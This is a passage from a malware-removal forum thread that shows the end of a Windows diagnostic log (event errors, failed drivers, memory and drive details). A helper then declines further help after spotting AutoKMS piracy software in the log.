Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:26:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:16:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 08:35:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 08:29:26 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (03/18/2018 08:19:16 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf

Error: (03/18/2018 08:19:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/18/2018 08:14:00 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf

Error: (03/18/2018 08:14:00 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/02/2018 12:09:03 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf

Error: (03/02/2018 12:09:03 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/02/2018 11:13:47 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

Error: (03/02/2018 11:13:47 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{9E175B6D-F52A-11D8-B9A5-505054503030}


==================== Memory info ===========================

Processor: Intel® Core™ i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 10%
Total physical RAM: 16321.73 MB
Available physical RAM: 14647.89 MB
Total Virtual: 32641.63 MB
Available Virtual: 31499 MB

==================== Drives ================================

Drive c: (Structure) (Fixed) (Total:238.37 GB) (Free:89.17 GB) NTFS
Drive d: (Entertainment) (Fixed) (Total:1863.01 GB) (Free:192.43 GB) NTFS

\\?\Volume{0a950ecd-376b-11e3-98f7-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: 37EB0193)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=238.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 37EB0198)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================


  • 0

#4
zep516
Posted 18 March 2018 - 09:30 AM

zep516

    Trusted Helper

  • Malware Removal
  • 8,090 posts
Hello,

I will not be able to follow through because of the found file AutoKMS
It's against forum policy to help if signs of pirated software are found and you have signs of it.

Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()

AutoKMS is software used to actively pirate software from Microsoft, either MS Office or Windows itself.

I also see windows activation license issues in the log. and the machine is badly infected
Error: (03/02/2018 11:13:40 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.
  • 0

#5
Viper Jr.
Posted 18 March 2018 - 11:05 AM

Viper Jr.

    Member

  • Topic Starter
  • Member
  • PipPip
  • 33 posts

Thank you for your time!


  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP